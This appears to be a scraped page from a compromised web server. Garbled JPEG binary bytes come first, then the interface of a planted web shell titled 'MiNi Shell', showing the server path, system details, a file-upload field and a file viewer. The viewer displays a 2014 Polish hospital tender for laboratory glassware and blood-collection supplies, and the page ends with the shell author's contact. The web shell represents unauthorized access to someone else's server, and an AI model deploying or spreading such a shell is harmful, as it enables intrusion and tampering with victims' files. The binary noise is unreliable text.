JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140627/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140627/215780-N-2014.html

<p class="kh_header"><b>Opole Lubelskie: Wyroby szklane</b><br>
<b>Numer ogłoszenia: 215780 - 2014; data zamieszczenia: 27.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Zdrowia sp. z o.o. , ul. Przemysłowa 4a, 24-300 Opole Lubelskie, woj. lubelskie, tel. 81 8272278, faks 81 8272278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozopolelubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Powiatowe Centrum Zdrowia sp. z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyroby szklane.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup wraz z dostawą laboratoryjnych wyrobów szklanych dla Działu Diagnostyki Laboratoryjnej  Powiatowego Centrum Zdrowia sp. z o.o. , 24-300 Opole Lubelskie ul. Przemysłowa 4a
Zadanie nr   1     Pipety automatyczne	j.m.	ilość
1	stałopojemnościowe pipety automatyczne o poj. 50 ml 	szt.	4
2	stałopojemnościowe pipety automatyczne i poj. 500 ml 	szt.	4
3	stałopojemnościowe pipety automatyczne o poj. 1000 ml 	szt.	4
4	pipeta automatyczna o zmiennej pojemności 10-100 ml	szt.	4
5	pipeta automatyczna o zmiennej pojemności 100-1000 ml 	szt.	4
6	pipeta automatyczna o zmiennej pojemności 1000-5000 ml	szt.	2
7	pipeta automatyczna o zmiennej pojemności 10-100 ml z wyrzutnikiem końcówek.	szt.	4
8	pipeta automatyczna o pojemności 50 ml z wyrzutnikiem	szt.	2
			
Zadanie nr  2     - materiały laboratoryjne pomocnicze	j.m.	ilość
1	bagietki laboratoryjne plastikowe długość 100-130 mm	szt.	600
2	szpatułki laboratoryjne drewniane długość 114 mm, szerokość 9 mm	szt.	600
			
			
Zadanie nr 3  System zamkniętego, próżniowego pobierania krwi. UWAGA: system o parametrach granicznych określonych w załączniku NR 1	j.m.	ilość
1	Probówka do morfologii z tworzywa, na 2 ml , zawierająca K2 EDTA, o wym. 13x75 mm	szt.	18000
2	Probówki do biochemii z tworzywa na 9-10 ml, zawierająca aktywator krzepnięcia, o wym. 16x100 mm	szt.	25000
3a	Probówka plastikowa lub szklana do oznaczania OB metodą liniową o poj. do 2 ml, zawierająca 3,8% cytrynian sodowy	szt.	8000
3b	Pipeta do oznaczania OB metodą liniową do probówek z pozycji 3a	szt.	8000
3c	Statyw do oznaczania OB kompatybilny z probówką z poz. 3a	szt	2
4	Probówka do koaguologii z tworzywa, na 1,8 ml zawierająca 3,2% cytrynian sodu o wym. 13x75 mm	szt	8000
5	Probówka z tworzywa na 6 ml do serologii o wym. 13x100 mm z rozszerzoną etykietą do wpisywania danych pacjenta	szt.	2000
6	Probówka do osocza z EDTA K2, 4 ml o wym. 13x75 mm z rozszerzoną etykietą do wpisywania danych pacjenta	szt.	600
7	Probówki na badania cito z trombiną, z żelem 4-5 ml	szt.	1000
10	Igła systemowa z gwintem, z osłonką zabezpieczającą przed zakłuciem, zamknięcie igły bez konieczności użycia powierzchni twardych, rozm. igieł 0,7:0,8	szt.	5000
11	Igła przeziernikowa z gwintem  0,8	szt.	20000
12	Igła systemowa typu motylek z drenem dł. max. 190 mm, trwale połączona z zaworkiem, w sterylnym opakowaniu /dla niemowląt i pacj. o słabych żyłach, min. 2 rodzaje grubości i zabezpieczeniem p. zakłuciowym	szt.	500
13	Uchwyt do igieł systemowych, z gwintem / jeśli system tego wymaga/	szt. 	25000
14	Nakłuwacz aktywowany przez kontakt, igłowy, głębokość nakłucia 1,5- 2,0 mm, do pobrania krwi z palca/pięty	szt.	16000
15	Mikrometoda do morfologii z K2EDTA o pojemności 250-500 ml	szt.	1000
16	Probówki do osocza z heparyną litową, poj. 4 ml, wym.13x75 mm  /op. a. 50 szt./	szt.	100
17	Probówki do biochemii z aktywatorem wykrzepiania 13x75 mm, poj. 2 ml	szt.	1200
18	igła systemowa 0,9 z gwintem	szt	1000
19	adapter typu Luer z zaworem	szt.	6000
20	Mikroprobówka z kapilarą do morfologii z K2EDTA na 200 ml	szt.	600
			
			
			
Zadanie nr   4     Wyroby laboratoryjne szklane	j.m.	ilość
1	bagietki szklane 200mm	szt.	400
2	szkiełka nakrywkowe 22x22 mm	szt.	20000
3	szkiełka podstawowe gr.> 1 mm z ciętymi krawędziami gładkie	szt.	2000
4	Kapilary do pomiaru hematokrytu z heparyną o poj. 20 ml i dł. 75 mm.	szt.	1000
5	Kapilary do gazometrii 100 ml z heparyną Na	szt.	1000
6	zlewki szklane na 500 lub 600 ml	szt.	10
7	zlewki szklane  na 1000 ml	szt.	10
8	zlewki szklane na 250 lub 300 ml	szt.	10
9	kapilary szklane heparynowane typu end to end na 20 ml krwi	szt.	2000
10	Cylindry miarowe na 50 ml	szt.	5
			
			
Zadanie nr  5    Wyroby laboratoryjne jednorazowe.	j.m.	ilość
1	probówki do serologii grup krwi z polistyrenu okrągłodenne o poj. 4 ml 12x75 mm	szt.	30000
2	Probówki typu Eppendorf o pojemności 1,5 ml z dnem stożkowym bezbarwne.	szt.	1000
4	Probówki o poj. ok. 10 ml, wielkość  ok16x100 stożkowe, z optycznie przezroczystego PS, ze znacznikiem (poj. 1ml)	szt	20000
5	Korki standardowe do probówek o średnicy 12 mm białe. 	szt.	5000
7	końcówki do pipet - żółte typu Gilsona	szt.	20000
8	końcówki do pipet - niebieskie	szt.	40000
9	końcówki do pipet - bezbarwne na 5000 ml	szt.	1000
10	pipety Pasteura o dł. 155 mm poj. 3 ml	szt.	20000
11	jednorazowe płyty do oznaczania grup krwi (5 rzędów x 6 dołków), bezbarwne	szt.	1000
12	Sterylne probówki z polistyrenu o poj. 10-11 ml, wielkość 16x100 mm, okrągłodenne, z korkiem.	szt.	500
14	pisaki do pisania na szkle typu Sharpie - op. x 10 szt. -czarne, grubość min. 1 mm, okrągłe	op.	10
15	statywy z drutu stalowego powlekane warstwą tworzywa sztucznego na 20 probówek o średnicy 16 mm	szt.	20
16	kamery do oglądania osadów moczu op. a 100 szt.	op.	15

Załącznik nr 1-Parametry graniczne systemu:
L.p.
Parametry graniczne
Wartość oczekiwana
wartość oferowana
1
System gwarantuje bezpośrednie pobranie krwi z jednego wkłucia do probówek i butelek na posiew krwi (bez dodatkowych elementów)
TAK

2
Wszystkie elementy systemu zamkniętego muszą być jednorazowego użytku.
TAK

3
Zamknięcie probówek typu gumowy korek zabezpieczony plastikową osłoną, umożliwiające wielokrotne zamykanie i otwieranie probówek bez użycia dodatkowych elementów.
TAK

4
Wszystkie elementy systemu zamkniętego służące bezpośrednio do pobierania krwi i probówki pochodzą od jednego producenta.
TAK

5
Probówki z etykietami umożliwiającymi identyfikację próbki, datą ważności, serią oraz  (dotyczy także igieł i strzykawek) oznakowaniem sterylności wg wymogów UE.
TAK

6
Oferent zobowiązany jest dołączyć po 5 sztuk zaoferowanego asortymentu celem potwierdzenia spełnienia wymaganych parametrów.
TAK

7
Certyfikat ISO 14001 odnośnie użytkowania i utylizacji - dołączyć kopię.
TAK

8
Posiadanie kodu barwnego pozwalającego na identyfikację materiału przeznaczonego do badań zgodnego z ISO 6710.
TAK.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.79.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli
przepisy prawa nakładają obowiązek ich posiadania ;
- Zamawiający nie określa sposobu dokonania oceny spełniania tego warunku,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia;
- Zamawiający nie określa sposobu dokonania oceny spełniania tego warunku,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem technicznym  do wykonania zamówienia;
- Zamawiający nie określa sposobu dokonania oceny spełniania tego warunku,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania  osobami zdolnymi do wykonania zamówienia;
- Zamawiający nie określa sposobu dokonania oceny spełniania tego warunku,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>sytuacji ekonomicznej i finansowej, :
- warunek ten zostanie spełniony , jeżeli wykonawca:
a)jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej
działalności związanej z przedmiotem zamówienia i suma ubezpieczenia wynosi
co najmniej 100 000zł.(sto tysięcy).
oraz
nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.spzozopolelubelskie.pl/index.php?option=com_docman&Itemid=115<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 24-300 Opole Lubelskie, ul.Przemysłowa 4a, pok. nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2014 godzina 13:00, miejsce: Powiatowe Centrum Zdrowia sp. z o.o., 24-300 Opole Lubelskie, ul.Przemysłowa 4a, pok. nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com